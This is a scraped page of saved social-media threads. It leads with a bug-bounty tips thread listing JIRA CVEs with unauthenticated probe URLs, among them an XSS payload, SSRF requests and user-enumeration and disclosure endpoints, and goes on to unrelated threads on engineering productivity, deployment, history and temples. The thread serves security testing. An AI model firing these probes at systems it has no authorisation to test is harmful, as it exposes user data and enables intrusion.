BC SOFTWARE

Saved by @CodyyyGardner

Harsh Bothra
@harshbothra_ 4 years, 5 months ago 1270 views

Save to PDF Share See On Twitter

#Learn365 Day-4: Unauthenticated & Exploitable JIRA Vulnerabilities

There are multiple security vulnerabilities associated with the various versions of JIRA software which are exploited in wild and is one of my personal favourite 3rd Party apps to hunt.

#BugBountyTips

(1/n)

(2/n)
1. CVE-2020-14179 (Information Disclosure)
a. Navigate to /secure/QueryComponent!Default.jspa
b. It leaks information about custom fields, custom SLA, etc.

2. CVE-2020-14181 (User Enumeration)
a. Navigate to /secure/ViewUserHover.jspa?username=

(3/n)
3. CVE-2020-14178 (Project Key Enumeration)
a. Navigate to /browse.
b. Observe the error message on valid vs. invalid project key. Apart from the Enumeration, you can often get unauthenticated access to the project if the protections are not in place.

(4/n)
4. CVE-2019-3402 (XSS)
a. Navigate to /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search

5. CVE-2019-11581 (SSTI)
a. Navigate to /secure/ContactAdministrators!default.jspa

(5/n)
6. CVE-2019-3396 (Path Traversal)
7. CVE-2019-8451 (SSRF)
a. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:[email protected]
8. CVE-2019-8451 (SSRF)
a. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:[email protected]

(6/n)
9. CVE-2019-8449 (User Information Disclosure)
a. Navigate to /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
b. Observe that the user related information will be available.

(7/n)
10. CVE-2019-3403 (User Enumeration)
a. Navigate to /rest/api/2/user/picker?query=
b. Observe the difference in response when valid vs. invalid user is queried.

(8/n)

11. CVE-2019-8442 (Sensitive Information Disclosure)

a. Navigate to /s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
b. Observe that the pom.xml file is accessible.

(n/n)
Tools: Nuclei Template can be used to automate most of these CVEs Detection.
H1 Reports:
- https://t.co/AaXKHt4NZZ
- https://t.co/hNrzpDgB5A
Blogs:
- https://t.co/ZMVc80vrYQ

More from Software

Ron
@CodeMonkeyZ

Oct 1, 2020 - Fulton CTY
"Mr. Gilstrap stated that he did not feel comfortable installing a last-minute software change, and did not want Fulton County staff to be responsible for installing it. He told us that he told Dominion to conduct this

Charity Majors
@mipsytipsy

Developer productivity, y'all. It is a three TRILLION dollar opportunity, per the stripe report.

Eng managers and directors, we have got to stop asking for "more headcount" and start treating this like the systems problem that it is. https://t.co/XJ0CkFdgiO

When people often have to spend weeks just to get a local development environment up, there is a lot to improve. \U0001f641
— Daniel Schildt (@autiomaa) December 20, 2020

If you are getting barely more than 50% productivity out of your very expensive engineers, I can pretty much guarantee you cannot hire your way out of this resourcing issue. 😐

(the stripe report is here:

Say you've got a strategic initiative that 3 engineers to build and support it. Well, they're going to be swimming in the same muddy pipeline as everyone else at ~50%, so you're actually gotta source, hire and train 6, er make that 7 (gonna need another manager too now)...

...which actually understates the problem, because each person you add also adds friction and overhead to the system. Communication, coordination all get harder and processes get more complex and elaborate, etc.

So we could hire 7 people, or we could patch up our sociotechnical system to lose say only 25% productivity to tech debt, instead of 42%? 🤔

By my calculations, that would reclaim 3 engineers worth of capacity given a team of just 17-18 people.

Advertisement

Yan Cui is making the ...
@theburningmonk

If you missed @clare_liguori's Continuous Delivery session this week (like I did) then good news, it's available on-demand now 🎊

https://t.co/78b8sI2hHs

And here's my play-by-play for the session

🧵...

This is a typical CD pipeline in AWS.

This is far more complex than the most complex CD pipeline I have ever had! Just cos it's complex, doesn't mean it's over-engineered though. Given the blast radius, I'm glad they do releases carefully and safely.

If you look closely, beyond all the alpha, beta, gamma environments, it's one-box in a region first then the rest of the region, I assume starting with the least risky regions first.

For anyone thinking about going multi-region (after the recent Kinesis outage), this is one of the complexities you need to consider. To do multi-region right and deploy safely (minimize blast radius), this is one of the complexities you have to factor in.

This "deploy small at first then more broadly" principle applies to #serverless apps too, though you can't "deploy to one box". You can do it with canary deployments instead, CodeDeploy supports this practice for Lambda (using weighted aliases) out-of-the-box.

John Mashey
@JohnMashey

@mattblaze AFAIK the only group to discover Ken’s hack was us in PWB/UNIX. One of the other guys noticed C prepreprocessor had gotten bigger, looked at binary namelist, found symbol not in source code. I got onto Ken’s system, found the code, very clever.

A bit latet, I was in Lab 127’s terminal room, talking to dmr or bwk, and overheard amusing conversation between ken and Robert Morris Sr, who sometimes consulted for NSA.
(RM Jr of worm fame was just a kid then.)

They were chortling away over cleverness of exploit. Then one (must have been ken) said “think we could put this over on NSA?” (which already had UNIX systems... we did favors now and then).
More chortling, then (must have been Bob): uhh, NSA really doesn’t have sense of humor.

PWB crew ran 1st real UNIX computer center & we were hyper-sensitive, partly because someone had called at night, told operator he was Ken Thompson & needed root password ... and got it. Turned out to be high schooler ... proving that social engineering tactics have been eternal.

Years later, as many BTL Directors were buying PDP11-70s for labs as general service systems, some PWB crew were asked to do security audits, given experience running biggest UNIX site. One lab was very proud of enhanced password software.
We did audit, agreed with that, BUT:

$Kenneth Cassel \U0001f40d$

Kenneth Cassel 🐍...
@KennethCassel

Software engineering interview experiences don't have to be terrible.

Thread on my best software engineering interview experience.
👇🏼 (Thanks @PaulYacoubian for the idea)

Starting from the top of the funnel, I heard of this company (fintech startup, close to $1b valuation, based in NYC) from a podcast they were advertising on, and I liked the mission.

I went to their website and applied.

Their application portal used greenhouse. One page and no need for re-typing resume info.

They had an open field that said "Tell me something we should know about you".

I wrote about how I was a career switcher, had kids, went to school while working full time, etc.

Here's where they started to stand out.

They emailed me back a few days later and sent me a calendly link to schedule my first interview.

Letting the candidate choose a time for an interview is a small detail but is great for reducing candidate stress.

I scheduled my first interview. I received an email detailing what the interview would be about, what to expect, and what to prepare for. It would be a casual chat.

My interviewer mentioned and asked tons of questions about the free-response field I had filled out earlier.

You May Also Like

Jonathan Ware
@ReassessHistory

Rhino Barges

One of the dullest, coolest, more bizarre and fascinating pieces of kit used in Normandy.

Which NO ONE REALLY CARES ABOUT.

BUT I DO AND YOU SHOULD TOO.
/1

#WW2 #SWW #History

Planning for Overlord and Neptune had a serious snag, how to get troops from LSTs onto the beach as simply ramming them onto the beaches and dropping the ramp was known to damage the exceptionally vulnerable LSTs and felt to be unsustainable in the mid to long term. /2

LSTs were essential in sustaining Overlord's progress and were a subject of major headaches in the planning phase, and a real subject of friction when it came to launching additional amphibious operations such as Dragoon.

A single LSTs loss represented a capability nick. /3

So, logic dictated, we don't really want these remarkable but rare and highly valuable vessels constantly doing beach landings, we want something to act as a medium between ship to shore, and in came the (mostly) American designed Rhino. /4

I fucking love Rhinos.

Seriously.

Graceful lines of pure industrial pedigree.

Modular.

LOOK AT IT. /5

Jaya_Upadhyaya
@Jayalko1

SRI KALAHASTI KSHETRAM, CHITTOOR (AP)
#bharatmandir

Panchbhootasthalam representing vayu element, also called Dakshin Kailasha.
As per Shiva’s boon, Vayu is incarnated here as Shiva and worshipped as Kalahasteeswara.
The kshetram is also associated with Rahu and Ketu.

The Kshetram is named after 3 devotees of Shiva- a snake, spider and elephant who worshipped a lingam in the forest. Elephant did jal abhishek with water from its trunk, spider protected it from dust by weaving a web on it and snake adorned it with his jewel.
@GunduHuDuGa

Once, the web and jewel got washed away when elephant sprayed water on the lingam. Angered snake entered elephant’s trunk and bit him but died in the process. The agitated elephant trampled the spider accidentally. Shiva gave moksha to all three.

Hence the name-Sri for Spider, kaal for snake n hasti for elephant.

Shiv bhakt Kanappa is said to have plucked his own eye to put it on the lingam here when he saw blood oozing from the eye on the lingam
This place is the ultimate location for Rahu Kethu Sarpa Dosha Nivarana.

Advertisement

Nicolas
@necolas

A brief analysis and comparison of the CSS for Twitter's PWA vs Twitter's legacy desktop website. The difference is dramatic and I'll touch on some reasons why.

Legacy site *downloads* ~630 KB CSS per theme and writing direction.

6,769 rules
9,252 selectors
16.7k declarations
3,370 unique declarations
44 media queries
36 unique colors
50 unique background colors
46 unique font sizes
39 unique z-indices

https://t.co/qyl4Bt1i5x

PWA *incrementally generates* ~30 KB CSS that handles all themes and writing directions.

735 rules
740 selectors
757 declarations
730 unique declarations
0 media queries
11 unique colors
32 unique background colors
15 unique font sizes
7 unique z-indices

https://t.co/w7oNG5KUkJ

The legacy site's CSS is what happens when hundreds of people directly write CSS over many years. Specificity wars, redundancy, a house of cards that can't be fixed. The result is extremely inefficient and error-prone styling that punishes users and developers.

The PWA's CSS is generated on-demand by a JS framework that manages styles and outputs "atomic CSS". The framework can enforce strict constraints and perform optimisations, which is why the CSS is so much smaller and safer. Style conflicts and unbounded CSS growth are avoided.

DTBhat
@dtbhat

The thread explains my momentum scanner and how to build it in #TradePoint software.
@Definedge
Conditions :
1)EMA 8 above EMA 34 and rising
2)Candle close above previous 5 candle high
3) RSI above 60
4) Volume above previous 5 candles
5) ADX above 30
1/n

Select Double Moving Average 8 and 34
2/n

Under Patterns select Close Above Prev Bars
3/n

Qualify the candle close
4/n

RSI above 60
5/n

Jaya_Upadhyaya
@Jayalko1

AHOBILAM NARASIMHA SWAMY KSHETRAM: KURNOOL (AP)
#andhratemples

Ahobilam is the place where Prabhu appears in his fierce form, called Ugra Narasimha, who is Svayambhu (self-manifest).
Ahobilam is one of the 108 Divya Desams. It has 9 shrines for different forms of Narsimha.

Ahobilam was the exact place where Sri Narasimha appeared and tore apart Hiranyakashipu to save Prahlad. At that moment, all the Devas appeared and praised him as Ahobala (Aho is mighty and bala is strength). So the place came to be called Ahobilam.

Out of the 9 shrines, most famous is the Ahobila Narasimha Swamy where Prabhu is seen as Ugra Narasimha.
In another shrine, Prabhu appears as Malola Narasimha Swamy. Malola means beloved of Lakshmi. Here Prabhu is in peaceful mudra with his consort Ma ChenchuLakshmi.

Jwala Narasimha Swamy shrine is the actual spot where the fierce anger of Prabhu reached its culmination when he tore Hiranyakasipu.

Ugra Stambham is the pillar from which Narasimha appeared with such force that the entire hill split into two.